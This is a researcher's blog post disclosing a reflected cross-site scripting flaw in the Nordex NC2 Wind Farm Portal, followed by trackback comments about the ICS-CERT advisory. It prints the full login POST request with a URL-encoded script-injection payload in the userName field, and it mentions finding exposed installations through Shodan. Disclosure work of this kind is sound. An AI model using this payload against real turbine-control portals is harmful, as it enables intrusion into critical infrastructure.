Nordex NC2 Wind Farm Portal Reflected XSS

Another saved Shodan search this one for Nordex NC2 Wind Farm Portal software. Copied some of the software (version 11.06.11) over due to it allowing open directory browsing (go to /1_07_00/nc2/program_en/ for example) and checked for issues:

POST /login HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/11_06_11/index_en.jsp
Proxy-Connection: Keep-Alive
Content-Length: 129
Content-Type: application/x-www-form-urlencoded

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&pw=nordex&language=en

nordex-xss1

update: ICS-VU-308064

About these ads

Tags: , ,

3 Responses to “Nordex NC2 Wind Farm Portal Reflected XSS”

  1. ICS-CERT Warns of Flaw in Wind Farm Management App | Threatpost | The First Stop For Security News Says:

    […] enables a user to control the settings and operations of wind turbines remotely. A researcher named Darius Freamon discovered a reflected XSS vulnerability in the software and published some details of it in the […]

  2. ICS-CERT Warns of Flaw in Wind Farm Management App « Cyber Security Aid Says:

    […] enables a user to control the settings and operations of wind turbines remotely. A researcher named Darius Freamon discovered a reflected XSS vulnerability in the software and published some details of it in the […]

  3. >kloctalk | Wind turbine software flaw enables remote exploitation Says:

    […] with all Nordex wind turbine generators to monitor and manage turbine production. The issue was first discovered and disclosed by independent researcher Darius Freamon on his blog. The Industrial Control Systems Cyber […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


Follow

Get every new post delivered to your Inbox.

Join 774 other followers

%d bloggers like this: